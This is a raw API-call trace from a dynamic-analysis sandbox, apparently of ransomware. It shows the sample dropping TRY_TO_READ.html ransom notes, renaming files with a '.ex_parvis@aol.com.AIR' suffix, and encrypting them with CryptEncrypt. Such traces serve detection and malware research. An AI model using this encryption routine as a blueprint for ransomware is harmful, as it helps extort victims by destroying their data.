	[0100.029] FindNextFileW (in: hFindFile=0x5da5b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1
	[0100.029] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a0
	[0100.032] FindNextFileW (in: hFindFile=0x5da5b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1
	[0100.032] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a0
	[0100.035] FindNextFileW (in: hFindFile=0x5da5b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1
	[0100.035] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a0
	[0100.038] FindNextFileW (in: hFindFile=0x5da5b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca740790, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca740790, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7668f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0100.038] FindNextFileW (in: hFindFile=0x5da5b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1
	[0100.038] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a0
	[0100.041] FindNextFileW (in: hFindFile=0x5da5b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0
	[0100.041] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.041] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.041] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini", dwFileAttributes=0x80) returned 1
	[0100.041] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini") returned 52
	[0100.041] GetProcessHeap () returned 0x540000
	[0100.041] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xce) returned 0x59d258
	[0100.041] lstrcpyW (in: lpString1=0x59d258, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini"
	[0100.041] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.041] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.043] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a0
	[0100.043] GetProcessHeap () returned 0x540000
	[0100.044] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x59d258 | out: hHeap=0x540000) returned 1
	[0100.044] GetFileSizeEx (in: hFile=0x4a0, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=402) returned 1
	[0100.044] SetFilePointer (in: hFile=0x4a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x192
	[0100.044] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.044] GetProcessHeap () returned 0x540000
	[0100.044] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.044] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.044] WriteFile (in: hFile=0x4a0, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.045] WriteFile (in: hFile=0x4a0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.045] WriteFile (in: hFile=0x4a0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.045] ReadFile (in: hFile=0x4a0, lpBuffer=0x5ffbd0, nNumberOfBytesToRead=0x192, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ffbd0*, lpNumberOfBytesRead=0x3a1f778*=0x192, lpOverlapped=0x0) returned 1
	[0100.045] SetFilePointer (in: hFile=0x4a0, lDistanceToMove=-402, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.045] WriteFile (in: hFile=0x4a0, lpBuffer=0x5ffd78*, nNumberOfBytesToWrite=0x192, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ffd78*, lpNumberOfBytesWritten=0x3a1f778*=0x192, lpOverlapped=0x0) returned 1
	[0100.045] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xca7668f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7668f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da5f0
	[0100.045] FindNextFileW (in: hFindFile=0x5da5f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xca7668f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7668f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0100.045] FindNextFileW (in: hFindFile=0x5da5f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0100.045] FindNextFileW (in: hFindFile=0x5da5f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1
	[0100.045] FindNextFileW (in: hFindFile=0x5da5f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1
	[0100.046] FindNextFileW (in: hFindFile=0x5da5f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1
	[0100.046] FindNextFileW (in: hFindFile=0x5da5f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca7668f0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca7668f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7668f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0100.046] FindNextFileW (in: hFindFile=0x5da5f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca7668f0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca7668f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7668f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0100.046] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.046] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.046] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk", dwFileAttributes=0x80) returned 1
	[0100.049] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk") returned 53
	[0100.049] GetProcessHeap () returned 0x540000
	[0100.049] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd0) returned 0x59d258
	[0100.049] lstrcpyW (in: lpString1=0x59d258, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk"
	[0100.049] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.049] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.051] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a4
	[0100.051] GetProcessHeap () returned 0x540000
	[0100.051] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x59d258 | out: hHeap=0x540000) returned 1
	[0100.051] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=363) returned 1
	[0100.051] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x16b
	[0100.052] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.052] GetProcessHeap () returned 0x540000
	[0100.052] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.052] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.052] WriteFile (in: hFile=0x4a4, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.053] WriteFile (in: hFile=0x4a4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.053] WriteFile (in: hFile=0x4a4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.053] ReadFile (in: hFile=0x4a4, lpBuffer=0x56b448, nNumberOfBytesToRead=0x16b, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x56b448*, lpNumberOfBytesRead=0x3a1f778*=0x16b, lpOverlapped=0x0) returned 1
	[0100.053] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-363, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.053] WriteFile (in: hFile=0x4a4, lpBuffer=0x597dc8*, nNumberOfBytesToWrite=0x16b, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x597dc8*, lpNumberOfBytesWritten=0x3a1f778*=0x16b, lpOverlapped=0x0) returned 1
	[0100.053] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.053] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.053] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk", dwFileAttributes=0x80) returned 1
	[0100.054] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk") returned 50
	[0100.054] GetProcessHeap () returned 0x540000
	[0100.054] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xca) returned 0x59d258
	[0100.054] lstrcpyW (in: lpString1=0x59d258, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk"
	[0100.054] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.054] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.056] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a4
	[0100.057] GetProcessHeap () returned 0x540000
	[0100.057] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x59d258 | out: hHeap=0x540000) returned 1
	[0100.057] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=929) returned 1
	[0100.057] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x3a1
	[0100.057] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.057] GetProcessHeap () returned 0x540000
	[0100.057] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.057] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.057] WriteFile (in: hFile=0x4a4, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.059] WriteFile (in: hFile=0x4a4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.059] WriteFile (in: hFile=0x4a4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.059] ReadFile (in: hFile=0x4a4, lpBuffer=0x5fb388, nNumberOfBytesToRead=0x3a1, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb388*, lpNumberOfBytesRead=0x3a1f778*=0x3a1, lpOverlapped=0x0) returned 1
	[0100.059] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-929, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.059] WriteFile (in: hFile=0x4a4, lpBuffer=0x5fb738*, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb738*, lpNumberOfBytesWritten=0x3a1f778*=0x3a1, lpOverlapped=0x0) returned 1
	[0100.059] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.059] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.059] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk", dwFileAttributes=0x80) returned 1
	[0100.060] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk") returned 48
	[0100.060] GetProcessHeap () returned 0x540000
	[0100.060] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc6) returned 0x598b60
	[0100.060] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk"
	[0100.060] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk.12781717671972518758.ex_parvis@aol.com.AIR"
